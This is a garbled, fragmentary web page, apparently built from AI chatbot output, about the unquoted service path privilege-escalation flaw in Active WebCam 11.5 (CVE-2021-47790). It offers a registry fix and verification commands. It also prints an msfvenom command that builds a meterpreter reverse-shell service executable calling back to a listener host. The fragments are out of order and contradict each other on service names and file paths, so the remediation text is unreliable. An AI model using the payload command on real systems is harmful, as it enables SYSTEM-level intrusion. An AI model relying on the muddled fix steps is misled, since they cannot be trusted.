April 12, 2026 Security Severity: Medium (Privilege Escalation)
: You can verify the fix by running this command in an elevated CMD: sc qc ACTIVEWEBCAM Exploit-DB Do you need help with a PowerShell script to automate this fix across multiple machines? Active WebCam 11.5 - Unquoted Service Path | Advisories 14 Jan 2026 —
If an official patch is unavailable or cannot be immediately deployed, system administrators can manually patch Active Webcam 11.5 by modifying the Windows Registry.
(Note: The space after binpath= is mandatory for the command to execute properly.) Verification and Prevention active webcam 115 unquoted service path patched
[SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveWebcamService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Active Webcam\SimvWebcam.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Active Webcam Video Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem Use code with caution. Broader Implications for Enterprise Security
C:\Program.exe (with Files\Active Webcam\webcam.exe as an argument)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe-service -o Active.exe Use code with caution. Broader Implications for Enterprise Security C:\Program
Active Webcam 11.5 (developed by PY Software) contains a high-risk security vulnerability known as an Unquoted Service Path This flaw is officially tracked as CVE-2021-47790 and was first publicly documented in September 2021 Exploit-DB Vulnerability Overview: CVE-2021-47790
sc config "ActiveWebcamService" binpath= "\"C:\Program Files\Active Webcam\WebcamService.exe\"" Use code with caution.
: Comprehensive vulnerability metadata and reference list available at Remediation & Patching Create a security advisory report for your IT team
C:\Program.exe (with Files\Active WebCam\WebCamService.exe passed as an argument)
Generate a to automate the fix for multiple machines. Create a security advisory report for your IT team.
Look at the BINARY_PATH_NAME output. A successfully patched service will display the path wrapped in explicit quotes:
Windows interprets spaces as potential ends to a command. If an attacker places a malicious file at C:\Program.exe , Windows may execute it instead of the intended program. A local attacker can gain SYSTEM-level privileges